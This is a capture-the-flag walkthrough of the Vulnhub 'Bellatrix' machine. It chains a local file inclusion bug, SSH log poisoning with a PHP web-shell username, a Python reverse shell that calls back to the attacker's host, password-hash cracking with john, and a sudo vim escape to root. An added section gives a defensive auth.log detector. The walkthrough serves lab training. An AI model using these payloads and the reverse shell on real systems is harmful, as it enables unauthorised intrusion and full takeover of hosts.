Bellatrix Vulnhub Writeup

The evil Bellatrix Lestrange has escaped from the prison of Azkaban, but as … Find out and tell the Minister of Magic

Difficulty: Medium

This works better in VirtualBox

Hints –> Brute force is not necessary, unless it is required. ncat is the key ;)

Social-Media: Twitter –> @BertrandLorent9, Instagram –> @BertrandLorente9

NMAP #

Bellatrix NMAP Scan

Port 80 #

[Screenshot of the site on port 80: a page titled AvadaKedavra with the menu items Network, Red Network Tools and DARK ARTS, followed by a long repeated string of "ikilledsiriusblack" that ends in ".php", pointing at the hidden file ikilledsiriusblack.php]

Port 80 Source #

Port 80 ikilledsiriusblack.php LFI #

SSH Log Poisoning #

┌─[root@redteam2020] ─ [Fri Dec 04 14:24:56] [~/ctfs/vulnhub/bellatrix]
└──╼ # ssh '<?php echo shell_exec($_GET["j1v37u2k3y"]);?>'@192.168.9.128
<?php echo shell_exec($_GET["j1v37u2k3y"]);?>@192.168.9.128's password: 

┌─[✗]─[root@redteam2020] ─ [Fri Dec 04 14:25:59] [~/ctfs/vulnhub/bellatrix]
└──╼ # 

ikilledsiriusblack.php?file=/var/log/auth.log #
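Added detection example, not part of the original writeup: a small Python check that scans sshd entries in auth.log for a PHP open tag in the client-supplied username, which is exactly what the ssh '<?php ...>'@host attempt above leaves behind before the LFI includes the log. The sample log lines, hostname, PIDs and ports are constructed for the example.

```python
import re

# Constructed sample lines modelled on OpenSSH's auth.log output for the
# attempt shown above; hostname, PIDs and ports are assumptions, not page data.
SAMPLE_AUTH_LOG = """\
Dec  4 14:20:01 bellatrix sshd[1200]: Accepted password for lestrange from 192.168.9.129 port 51200 ssh2
Dec  4 14:24:56 bellatrix sshd[1234]: Invalid user <?php echo shell_exec($_GET["j1v37u2k3y"]);?> from 192.168.9.129 port 51234
Dec  4 14:24:58 bellatrix sshd[1234]: Failed password for invalid user <?php echo shell_exec($_GET["j1v37u2k3y"]);?> from 192.168.9.129 port 51234 ssh2
Dec  4 14:26:10 bellatrix sshd[1240]: Invalid user admin from 10.0.0.5 port 4444
"""

# sshd writes the client-supplied username verbatim between "user " and " from ",
# both for the "Invalid user" line and the "Failed password for invalid user" line.
_INVALID_USER = re.compile(
    r"sshd\[\d+\]: (?:Failed password for )?[Ii]nvalid user (?P<user>.+?) from (?P<src>\S+)"
)
# A "<?" in the username is enough for a PHP include() to start executing the log line
# (covers "<?php", "<?=" and short open tags).
_PHP_TAG = re.compile(r"<\?")


def find_poisoned_entries(log_text):
    """Return (line_no, source_ip, username) for sshd entries whose username
    contains a PHP open tag, i.e. log lines that would execute if the file
    were pulled in through an unrestricted include()."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        m = _INVALID_USER.search(line)
        if m and _PHP_TAG.search(m.group("user")):
            hits.append((line_no, m.group("src"), m.group("user")))
    return hits


if __name__ == "__main__":
    for line_no, src, user in find_poisoned_entries(SAMPLE_AUTH_LOG):
        print(f"line {line_no}: PHP tag in SSH username from {src}: {user!r}")
```

The log entries are only a symptom: the actual defect is the file parameter that lets ikilledsiriusblack.php include arbitrary paths, so allow-listing the includable files removes the vector whatever auth.log contains.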

Reverse Shell #

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.9.129",1334));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
┌─[root@redteam2020] ─ [Fri Dec 04 14:29:05] [~/ctfs/vulnhub/bellatrix]
└──╼ # 

www-data shell #

Crack hash with custom wordlist and john #

[Terminal screenshot: the hash file Swordofgryffindor holds one sha512crypt ($6$) entry for the user lestrange; running john Swordofgryffindor --wordlist=secret.dic loads the hash and cracks it as ihateharrypotter]

Password for lestrange #

lestrange:ihateharrypotter

SSH lestrange #

Sudo -l #

So in our case #

sudo /usr/bin/vim -c ':!/bin/sh'

ROOT #

[Terminal screenshot: cd /root and a directory listing showing root.txt and script.sh; cat root.txt prints the root flag, and id;hostname;date confirms a root shell on the host bellatrix]